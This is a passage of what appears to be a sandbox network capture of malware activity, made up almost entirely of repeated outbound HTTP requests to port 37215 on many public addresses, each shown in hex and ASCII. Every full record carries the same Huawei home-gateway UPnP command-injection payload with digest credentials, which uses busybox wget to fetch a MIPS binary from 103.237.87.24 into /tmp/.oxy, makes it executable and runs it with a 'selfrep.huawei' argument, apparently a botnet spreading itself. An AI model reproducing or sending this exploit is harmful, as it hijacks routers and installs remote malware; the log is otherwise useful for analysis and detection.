69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  334192.168.2.1334444197.233.27.1237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.099647045 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  335192.168.2.133873044.222.255.5437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.099647045 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  336192.168.2.1351738157.22.197.12937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.099677086 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  337192.168.2.1356966197.254.135.24937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.099683046 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  338192.168.2.1339830197.168.225.15437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.099689007 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  339192.168.2.134449880.158.99.25437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.099704027 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  340192.168.2.1360442157.41.132.23737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.099724054 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  341192.168.2.135471041.205.230.6237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.099737883 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  342192.168.2.1354024157.157.14.22637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.099746943 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  343192.168.2.135803883.200.221.637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.099747896 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  344192.168.2.1349062157.243.47.22237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.099773884 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
